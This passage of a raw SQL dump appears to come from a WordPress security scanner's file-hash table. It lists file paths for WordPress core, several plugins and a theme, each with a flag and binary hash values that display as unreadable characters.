��ܪ9����?���a���z�','',0,'?'),('0��%E�i��5v�Z��','wp-content/plugins/wp-cerber/assets/flags/vc.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N����G=�z^�_��','���d��1x���tE Aā�`��w�1���v�e�','',0,'?'),('0�_��]1��Zcv','wp-content/plugins/wordpress-seo/css/dist/dashboard-1851-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m��_9b���L7',';�Rhe�=m�HYjb[ɱ�-��!շ�l','',0,'?'),('0���m&��\"�5� µT','wp-content/plugins/wordpress-seo/src/context/meta-tags-context.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	\"R{E��КNggdw7','���.����]�tk�ɯ���JEs�5X���M','',0,'?'),('0�,1�j�4\r��(�','wp-content/plugins/wp-cerber/assets/flags/sn.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z�,u�V�l``�','0�_W>��|S���o)������~��	\r�','',0,'?'),('0�dۦZP�2��o�','wp-content/plugins/wordfence/lib/menu_firewall_waf_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<\rL_C���jə��ȝX',',�ް+R���Q��u��mm��(e�ЅX�{^','',0,'?'),('0�8�Zʭc[c���','wp-includes/wp-includes/sodium_compat/src/Core32/ChaCha20/IetfCtx.php',0,'���|�Ww�b>E��yJ','���|�Ww�b>E��yJ','�\'�����~�6ȝ\nB���agz���d��Q','',0,'?'),('0�i��LS� �q���','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-firewall-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��U\n���`��k���','^�߬�L�3��V	ho0\\����s�s���v','',0,'?'),('0��$X8F�nŃk���','wp-includes/js/dist/vendor/wp-polyfill-dom-rect.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��f�UEM��X`�G�','�E\'Px%���,�4��4;k60+�K���.Q]','',0,'?'),('1ݍq�f�29��P�_�','wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/vendor-typekit/src/core/fontmoduleloader.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d�*�&�(^.%�j','�B}hԻ�\0������Eb��LX�b�\r4�','',0,'?'),('1E�Ϻ�SF�TúE��','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/UploadedFile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|�Y�qf2��ȥ','�,��b~t�0�V\r��p<n�F�C/�1BN��(��n','',0,'?'),('1j�S�JmQ��s��7','wp-content/plugins/wp-cerber/languages/wp-cerber-pl_PL.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��L��X�p2�_d\0','Ea�o�\Z��zz=2�c}���8���ǃW','',0,'?'),('1����Ws�i1�B�','wp-content/plugins/wp-smushit/_src/js/smush/lazy-load.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']\0�ҧ>��Y���3_�\"','�)��\0�[��V`��j_��lm�f�23*I2�-/','',0,'?'),('1 x��!���Y�}L�','wp-includes/wp-includes/js/dist/date.js',0,'�W!j`(�YՌ�f�','�W!j`(�YՌ�f�','��2�&�;��F�7�A\nOM�X�����','',0,'?'),('1-�����g97���','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/error_polyfill.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�B���.��}�F�','��c�(����k1�����2�Qw4��?0','',0,'?'),('1.�g��\']�����w�','wp-includes/wp-includes/js/jquery/ui/mouse.js',0,'����IJi��\r���','����IJi��\r���','�P��<\n��+�q� ™��NJ�+��s���b���','',0,'?'),('1?o�x��<�?���6','wp-content/plugins/wordfence/views/blocking/option-bypass-redirect.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?v@�Y�a�p�v���','p���ZʇO�F�M��4�V92�QP��\0����','',0,'?'),('1Ag\r%�1��kp','wp-content/plugins/redirection/actions/url.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u��7��銡d��V','Q�����J3��2�Aؿ�‹�N�u�+TR܊$�','',0,'?'),('1lɱ4�0Lt��KT��','wp-content/plugins/wordpress-seo/src/deprecated/src/presenters/admin/link-count-indexing-list-item-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��t\0��R����!�j','����\0�p�e�d�Jg׌8`z0�|`rH���','',0,'?'),('1s�)6�Ӷ���C��Η','wp-admin/user/admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T^�1�����A�|','Y��%մ9����N��?\\v\\a��M���~݋','',0,'?'),('1ty@vG`�1\'����','wp-content/themes/twentytwentythree/templates/home.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\s��n�֪��n����','x�$���\r<�M���^2��6�����bQ�','',0,'?'),('1t��)@��,Z�n�','wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/vendor-typekit/src/modules/fontdeck.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o�J�cu��P�`��','��J�H5�S/����kǫ.�������^��j','',0,'?'),('1wC.�\Z\"\0�����','wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-generic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\^	BJ\0d�����','<`��pG��0���I�B\ZǦI_!w�=K�3��?1','',0,'?'),('1|v�<��-V��A]�','wp-content/plugins/wordpress-seo/src/exceptions/addon-installation/addon-installation-error-exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��s��Ԃh�$ �-',' �Z1﯈��D�<�+�K�y�E��U�`�K��','',0,'?'),('1��K�Y�х?_�~���','wp-includes/wp-includes/l10n.php',0,'���(��C�h���#','���(��C�h���#','�Ǹ�9�1Y�����5$�?,=�M�2.��r�','',0,'?'),('1��/	`�s���;=\Z','wp-content/plugins/wordpress-seo/src/repositories/indexable-repository.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ƙ\0�K��6B�\'','�Ԩ�s�Qd��q�@�p�2=0�\n��el*','',0,'?'),('1�7�F0ܩ��^ �l','wp-content/plugins/wp-cerber/admin/cerber-tools.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F���c]Ϣ�f1����T','CgK�ٍ��10\nD��-a-�k�*���rhT','',0,'?'),('1��M\n����j����v','wp-content/plugins/wp-cerber/assets/flags/gp.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?���?�$����:','��h��8=yi,\n��s��S6��/�5�u�','',0,'?'),('1���pa�`H0ߢ�e','wp-includes/js/dist/url.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$��`�1��',' ����\\�6��@B�s�c|\0�4W���P3H�','',0,'?'),('1�W͎�XD=-���','wp-content/plugins/wordpress-seo/src/generators/schema/howto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[y>�h,<c����','0����6�\rr��m-��\\�+=�`��m�b,','',0,'?'),('1Ζ*&mj�v���ѓ^','wp-includes/wp-includes/css/wp-pointer.min.css',0,'1�U�Y�D�K�z�c','1�U�Y�D�K�z�c','>�;��]ۼH�Ֆ&�ݟ�������`;�','',0,'?'),('1БY���4I^p�','wp-includes/sodium_compat/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�#p}�N0ڿAy(\"','S_�.��YL���ja�<a\'��ԵA�#V�;5�','',0,'?'),('1�P��|����&)L�D','wp-content/plugins/wp-fastest-cache/images/close-wiz-sprite.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6x�+��]7E�M{�','�@u�/�{��i5�σ;�a�	\nd{�G�o/�kF�','',0,'?'),('1�aIt�U>)��Vr','wp-content/plugins/wp-smushit/app/assets/images/onboarding/graphic-onboarding-original@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���D��@�2��f$b�','9�A��Z�:�eä���ۛ��s¹�_�','',0,'?'),('1ۭz�� ~t2b?[I�','wp-includes/wp-includes/media.php',0,'D��|��ߟa]IW�S�J','D��|��ߟa]IW�S�J','R�y��n�lq��侅��.�$�����%','',0,'?'),('1�EfQ�v#)�\n�0EkQ','wp-admin/images/media-button-image.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���m�	\'���A','iķ��z[����/\"� X���{�o��:��','',0,'?'),('1�U����W���P8?','wp-includes/wp-includes/class-wp-post.php',0,'�;@A��[�oh�́F�','�;@A��[�oh�́F�','Bms������AKE)(|-�c����ϡ�|��d','',0,'?'),('1�#b���~ 2Zd�y','wp-content/plugins/wp-smushit/app/assets/images/folder-closed.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���+����I��q�1','�}?��No�9L�]*�15������y�\"','',0,'?'),('1��X�/�t60^Ҁ!�7','wp-includes/js/comment-reply.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I/,\Z~��B�|�\Z�','C�Y3M�lO2��|��T!�Q$�=�@ӧ�O$TD','',0,'?'),('1��#\'\0����ț�`','wp-includes/wp-includes/sodium_compat/namespaced/Core/Ed25519.php',0,'��v>��#��!n�(','��v>��#��!n�(','�DFUu|�v��/�]�2x_ERL2QlP93s	�15�','',0,'?'),('2Z�v��p$x�@V�','wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps-cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iH\0�L��d��#��','g�I�b�ԝ�/�U`zhd<A{S=v�g~��\Zг','',0,'?'),('2\ne�|��((��ڧҿZ','wp-content/plugins/wp-cerber/assets/flags/vi.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ͳ�CuI���Q��','�-�J�V��K��1�ꫛS&Dƴng]#','',0,'?'),('2J�y*�m����]W','wp-includes/js/dist/a11y.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+O�$�?邦�N\0�o','���ݧ�d_���a�O#�qi:��(�+��','',0,'?'),('2b�U��\0��s�pd0�','wp-includes/js/clipboard.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s�����djI~�i�T�','Q����]qF����ضU��J�\"���\r�/^0','',0,'?'),('2 �8u��p�y����','wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519.php',0,'�ś�L�\\�Pڜ�U','�ś�L�\\�Pڜ�U','c>�5�o�������𽃐�_�T9�L~;�e7�','',0,'?'),('2&M�V?fĐ�m���','wp-content/plugins/redirection/locale/redirection-fa_IR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z)V�ݐ��J_��Ҝ�','��1̚I�o{��\Z�lR\'|�+��F�\n���','',0,'?'),('2?��k�>�\"J]Sa!','wp-content/plugins/wp-cerber/languages/wp-cerber-zh_TW.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�hoĠAј����','t�F>E�:�\')9`���u��ě��W�','',0,'?'),('2@�j�j\0�kӲ��Ә','wp-admin/includes/template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<���w��Z� H����p','p‰�i�S1���Z�N�de����um-�B','',0,'?'),('2D��%�J����?��\Z','wp-includes/js/dist/wordcount.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~����^WT��\\�1��','�+�SF�D0.�\rΛ5�9��l ��M��M�','',0,'?'),('2Y� ��oq&�Z���','wp-includes/class-wp-block.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"�8�^�=�ф5I��','�vV�B��z�A�]PkKC���Ȍ���Ӿ��','',0,'?'),('2f~���v��X�3�L','wp-includes/blocks/post-comments-form/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�3�;�p˗m��x���','5�d�AH?�^�f`)�ׅ��蹈�>����D�b�','',0,'?'),('2gl�bC�d�M`H��','wp-includes/css/dist/block-library/reset.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�D܁�ȦD�P\\�','|$������7��vuVjj�������0\"���','',0,'?'),('2j�L,���W\r��W$��','wp-admin/css/colors/sunrise/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7�:a�?�\0ה��J�','���;��:!�z`���������Tџ','',0,'?'),('2o�8ɦ�hY9�	Z<','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/promises/src/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����EN�g�(��a(X','��\\Y|[*����O�\"�W\06�hR=�	�','',0,'?'),('2r}�V�ĥ$^���n/','wp-content/plugins/wordfence/css/images/ui-icons_777777_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�^n=(��&��݂�N&','S��DIB�z�_-?(Y��pE�y�ƹA�','',0,'?'),('2���8�`�/J�t','wp-content/plugins/redirection/matches/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>z�~C(Mغ�~�','j�QE߆ؾ�7�%��Fl�T\"�&��m���\'','',0,'?'),('2���!C|�R4�ض�J','wp-includes/blocks/paragraph/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ���U�Ң<A��N�','0���3s����V�~�bݨ���W-N�P�41|�','',0,'?'),('2�Hȿ��_�?96','wp-includes/wp-includes/sodium_compat/src/Core32/XChaCha20.php',0,'\r�*�un�rdu�g���','\r�*�un�rdu�g���','�ҷ<h�bo�>�W��\Z�N��� e��ia�','',0,'?'),('2�@����\ZJ�%!�','wp-content/plugins/wordpress-seo/src/deprecated/src/presenters/admin/indexation-list-item-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�4�`$K�\r�W�&�','bu�b_���]s ~#���R�{1G`���EcA�','',0,'?'),('2��\r�\n��=8}��ŁX','wp-content/plugins/wp-cerber/assets/flags/eg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[�Q7�KN���`>H','fh��h4�Ҳy3(��[�B�\\�Ap�0��<����','',0,'?'),('2�|�΢(ủt��T��','wp-admin/privacy-policy-guide.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���{d8��gHB�7�{','ԣ��Q��9�$�y��p�|�m��g�<��.�$*�','',0,'?'),('2��㺨a|F�l3]�','wp-includes/customize/class-wp-customize-new-menu-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	�sL2/�B�����','H\'�s�ӽ����I�$��Ӧ�ͤ�X�!�','',0,'?'),('2�v��\'��9\r��z','wp-content/plugins/wordfence/css/images/ui-icons_555555_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��bD�@p�G+��','*DZ�>�Bg�&Y�Y������4(<�/','',0,'?'),('2�teˁ<���+2�','wp-content/plugins/all-in-one-wp-security-and-firewall/vendor/composer/autoload_classmap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y�tP�>Ra�S�@-','u{4���s��J����3�H��6ow�r','',0,'?'),('2�-�D���8���','wp-content/plugins/wp-fastest-cache/languages/wp-fastest-cache-es_AR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���6\0i)��k�\"\rX','��$w��>�������Ϟ��5�q��L','',0,'?'),('2ģ��_�D�x���','wp-content/plugins/wordfence/views/common/block-navigation-option.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O�����~�}t.�K','M�N��������F`\r9���ӫ�rP�,Q','',0,'?'),('2��1�����)�nZ','wp-content/plugins/wp-cerber/languages/wp-cerber-pt_BR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����5�����N�','�^�?�t}�?�Ce�A��pr3C���<m','',0,'?'),('2�\\F!\"x��� .�K8','wp-content/plugins/wordpress-seo/css/dist/elementor-1851.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�fȝ�m[���θ��','M���3�]�O�y��9&f���^�4n�g\\m','',0,'?'),('2��Zs��+z��','wp-includes/css/dist/block-directory/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CY�3�]zQ�[5��','���ڕh�/�z\n���Kg���\"�|,','',0,'?'),('2�0mK�:r²\\0\nB�','wp-content/plugins/wordfence/views/options/option-toggled-boolean-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x���9/��Z�h�6�\n','�J<<���x?�#�o������Jn8�:j��','',0,'?'),('2��^(��ʭ�-^x��','wp-includes/SimplePie/Enclosure.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R����\'�G�ko�','Z:�\r�}n�Z��`�tj�!L�l�	{���bg�','',0,'?'),('3\Z�-Ғ���,j�','wp-includes/blocks/comment-date.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�å��k	��5�','�l味dMkCW����U����3a��E�','',0,'?'),('3&|P®�+�B#��X','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/zh-TW.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E@A������','��`�ޒ-�q%���B/�F�$�����\n','',0,'?'),('3+z��.���6Q~]y[','wp-includes/js/tinymce/plugins/wptextpattern/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�	�Q�\Z�n�¹','��� ��D|b�<u򋥾&n)n$M��E���Am','',0,'?'),('3-�\'����*�.�%B','wp-includes/wp-includes/js/codemirror/esprima.js',0,'d_� �S��g��ٛ��','d_� �S��g��ٛ��',']�;�%Js��lx��Fq��BH\Z�U8��','',0,'?'),('3Y�#��6r\n�Yp�$��','wordfence-waf.php',0,'����Ob#�%�yuw','����Ob#�%�yuw','�����f�����0�yv�@�������2','',0,'?'),('3cF�/�s�V��tj','wp-content/plugins/wordpress-seo/src/schema-templates/preparation-time.schema.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��B�%@G��b�','�`iB�#�-��e�1_�B��p�\\P�I\'�M��','',0,'?'),('3d�Ϋ�jK�<u��c!w','wp-content/plugins/wordpress-seo/src/helpers/schema/article-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���׃M���\r�}��','s��{�L��ߕ��,�9��`e�����!�U��8','',0,'?'),('3g���W��Zf9�','wp-includes/wp-includes/cron.php',0,'$�B�돗��QG�z','$�B�돗��QG�z','8�+\'p���|��ц�K��O�<�_e�-','',0,'?'),('3h���\"I+[��E','wp-includes/js/clipboard.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\r8ܞRO@��','3>0����D�2!J�w@��Ly����','',0,'?'),('3k��oW�5	k[mq','wp-admin/includes/continents-cities.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����^�z\r�r����','��������,�`ĭ$��7��܁��{n','',0,'?'),('3p���\\�8�lD�q','wp-includes/sodium_compat/namespaced/Core/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��*�kLwB��d�=','ec[d�M?H�|�KY�\04��@� QA��:FF �','',0,'?'),('3p�DL���ﳲƔ��','wp-includes/wp-includes/js/jcrop/jquery.Jcrop.min.js',0,'/a��Lru�4�\Z�','/a��Lru�4�\Z�','���Ϸ��yd�ix�{�p+��n�eځ��f�','',0,'?'),('3w���|��M\'��CÌ','wp-content/plugins/wordpress-seo/css/dist/toggle-switch-1851-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y�f��,hs�gq>A','17U,\0֒b+��%��WR���5D���/m\'u','',0,'?'),('3z\'�O��v�J&�� ','wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',&����\'da0�','he0��93�9�:�\ZJ�m0L�Ur4��ef','',0,'?'),('3���\09��Z�A���.','wp-content/plugins/wordpress-seo/js/dist/languages/he.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0��LD��m�\0�S','h���U��g\"C�:1�[qˋ�X{�cH\"7�','',0,'?'),('3�s���-1���!','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Tool/QueryBuilderTrait.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z��d����?��G�W','E�c�#�[$�=U���<�׭�Zn�q��z�	�','',0,'?'),('3�;\"5���$�_\\�D�','wp-content/themes/twentytwentythree/styles/canary.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�XP$�\'�7汹��','��u�AMR�k�����t˰��\'�@�5-','',0,'?'),('3��J%k������?�','wp-content/plugins/wordpress-seo/admin/views/tabs/network/features.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��8\Z���\'� i�ɘ#','Y��z���>w�g�O���������ŗD*:��','',0,'?'),('3��JΑTg�0��\'e','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/Common.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`4���uB\nE�#@��W',')r�xUYJ�;hpjH{\\����1\'#�� s�','',0,'?'),('3�b�[���I�3xb	','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/te.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�]�G�⾷��Wp!�','�\Z9\0��]7Ӛb\'���b�ˑ\0-��G��J9�','',0,'?'),('3�l���V9Np�','wp-content/plugins/wordpress-seo/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��~�S}L�~#vv5�+,','-j�H�p�3Ů՚%<O�.�4L��:�v�&c�','',0,'?'),('3��*$đ�A�Óa�','wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-multicheck.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��6y�$�wl�~{`�','ܝ��¡��HkY�����:�(��u�����0','',0,'?'),('3���\'���RK�Bf�','wp-includes/js/tinymce/plugins/wpdialogs/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QO1�/<�>%\"�X��','�6�r�*�IY\0�C�9<��Jږ J*�xD','',0,'?'),('3��fQ3�h�5[��W�<','wp-includes/Text/Diff/Renderer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� �C0�Y7O�@�GS','EWj�+��\\��=����}.��1\r��|','',0,'?'),('3���औO�5(�','wp-includes/theme.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I���0nB�T�4','����Q�KA��R��#J��F��:��','',0,'?'),('3��ng\0��\\\0	�W','wp-includes/IXR/class-IXR-value.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��f�>�5l�j\0f�','�?h����͇ X��UP�O|H$�1���','',0,'?'),('3��#7\ZJJ(9tY!�H','wp-content/plugins/wp-smushit/_src/js/modules/bulk-restore.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���$HES�Vs�Oz','.DR�e�2�@����C���PH-�I��1','',0,'?'),('3���g���BP��O','wp-content/plugins/redirection/locale/json/redirection-fr_FR.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�է/\'�>�<�ɛz�+','-���}m�<>t�=�����…�\n��-C�','',0,'?'),('4\n��	m�]Ŀ�Њ��','wp-content/plugins/wordfence/views/scanner/issue-easyPassword.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!��{\\� d����`�','���ǿ\'�ɜ�LҪ�B>���	&-�{���','',0,'?'),('4��$1AV�Re\r��:i','wp-content/plugins/redirection/matches/user-role.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1U��\"1��X�e�/��','��G4)�A�\'I�r(�\"蓴�d�F_�\Z��','',0,'?'),('4f�mFw��\n��>','wp-content/plugins/wordpress-seo/src/helpers/url-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�8+\n�2^R(of��o','�\0��h��8�Ҟ��z-r��B�J��d$��[Y','',0,'?'),('4�31@�*r�����8','wp-includes/sodium_compat/namespaced/Core/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ś�L�\\�Pڜ�U','c>�5�o�������𽃐�_�T9�L~;�e7�','',0,'?'),('4m�6�)�:5�t�q�','wp-content/plugins/wordpress-seo/admin/import/plugins/class-importers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6��#6��\'��ˌE,*	','|�r�\'����X���`yv�8��r������','',0,'?'),('4&��)A�4tf}�','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/rss-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��쐯�M7d~i�Q','�rc\r��)r*�@렏2��D��ΐ;E��','',0,'?'),('42��5�o=�S�#��','wp-content/plugins/wordpress-seo/admin/views/tabs/network/integrations.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�9O�4vg9�e�c�6','^��`�/����?�qғ�ǘZ݊�c�v�;Uig','',0,'?'),('48�Vt���+^X�','wp-includes/pomo/mo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��v7�d�Fi��Ϙ4','�\\��h\no�މ��!���=�^\"K�$ol.\Z','',0,'?'),('4;`߯z�?	�{Ǟ@','wp-content/plugins/wordfence/images/2fa-whole.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h»����$\ZPfX�','�ƪɝ����U[Z~��^�d�\'�X�ٮ���','',0,'?'),('4;��2������@y','wp-includes/wp-includes/js/tinymce/plugins/wpgallery/plugin.min.js',0,'cdxo&l�g�8�3��','cdxo&l�g�8�3��','�h_�8��r0�y-��\nϥ��KL-� {','',0,'?'),('4AI�n09��7c`','wp-includes/js/tinymce/utils/validate.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CL�1?o+;���{Y�','k�H��;�\0�kC�s�	\'K�#45+eE|���0','',0,'?'),('4D�=�pg`6�z��y','wp-content/plugins/wordpress-seo/src/presenters/breadcrumbs-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0vGl��C����A��','����2س�K2~b��#��݈��\'�Q�R��r','',0,'?'),('4Lk�iADQ���%�P�','wp-content/plugins/wordpress-seo/src/conditionals/yoast-tools-page-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A���O¥���(i>','�=��T�tn��P�OS���Ä�diB��y�','',0,'?'),('4To���iE��t�','wp-content/plugins/wordfence/views/blocking/options-group-advanced-country.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7�s\r>J��(���E�','�K����(w��B$�\r�s��줇!�ਿ��D','',0,'?'),('4V6��uf	���J�Kd','wp-content/plugins/wordpress-seo/src/helpers/schema/image-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"�4M�����>E`��','�{��,�켤E����D�o0��Bɿ�K�e','',0,'?'),('4_��}\0��ʪQ���!M','wp-content/plugins/wordpress-seo/js/dist/externals/replacementVariableEditor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�bpF?��%�\0(�','�\\���΁p��n�N��\\�� 씃���Bnr�','',0,'?'),('4a�[I�}���H�m)','wp-admin/css/deprecated-media.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>�y��Z��J�Yn>','����t2�nP�:5���$O�3��\r����','',0,'?'),('4�qEyVS/��o}�','wp-includes/blocks/tag-cloud/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R��	��1��I�H3F','�?sl�\\\rE���)\n�e�0�\"��S)*i�]','',0,'?'),('4�V�w3I�.\Z߈3�?�','wp-content/plugins/wp-cerber/assets/flags/io.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','͠�ߛ�9.-�Μ��/','�}g�X�o���1�7�o�z���2w{���p�','',0,'?'),('4�˟H��<�3`x�d','wp-content/plugins/wordpress-seo/src/presenters/admin/premium-badge-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|$J!��v&e7�(A','�d?�\n���R~��lU3����׋ۖi�o','',0,'?'),('4���X.-Ӳ��\nAJ','wp-content/plugins/wordfence/languages/wordfence.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�%zվ`W��f��y�','�E;L>ގ|ࣜ�x�蘱y~�}��9gM�','',0,'?'),('4������Kv 	V�','wp-includes/wp-includes/js/crop/cropper.js',0,'����H.s�o����','����H.s�o����','�py����,B�����G��-�t�����=�s','',0,'?'),('4���=�T�n}�&��','wp-includes/wp-includes/css/jquery-ui-dialog.min.css',0,'��S`���7у�-�','��S`���7у�-�','j�&�Ұ�M������u�@��6L}�5����{','',0,'?'),('4ڂ��L$�,K[�u��','xmlrpc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A�8\nP*�a|/ٳK','XdB�c\0���2��Ý��c���g�������','',0,'?'),('4܅�V�oF�ā^\n�\'','wp-content/plugins/wp-smushit/app/assets/js/smush-lazy-load.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�